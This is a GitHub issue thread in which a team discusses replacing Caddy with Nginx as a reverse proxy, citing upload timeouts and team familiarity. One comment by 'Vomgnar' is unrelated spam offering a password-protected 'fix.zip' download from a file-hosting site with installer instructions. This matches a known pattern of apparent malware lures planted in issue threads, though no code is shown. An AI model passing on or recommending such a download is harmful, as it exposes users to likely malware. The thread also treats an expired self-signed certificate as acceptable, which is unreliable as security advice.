### ISSUE TITLE
Switch reverse proxy from Caddy to Nginx

### ISSUE THREAD

**Issue by eecavanna** [microbiomedata/nmdc-edge#289]
Motivation:
- File uploads fail after ~5 minutes and we think it's due to Caddy doing something (for example, we see—in the Caddy docs—that Caddy, by default, has a 5-minute limit for "idle" requests)
- Our team members are more familiar with Nginx
- One of the selling points about Caddy was the easy SSL setup; but, since we use Cloudflare, we don't need a normal SSL setup on our server—we can get by with a self-signed SSL certificate that has expired (as long as it's for the correct domain)

CC: @mflynn-lanl

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eecavanna** [comment]
Related: #232
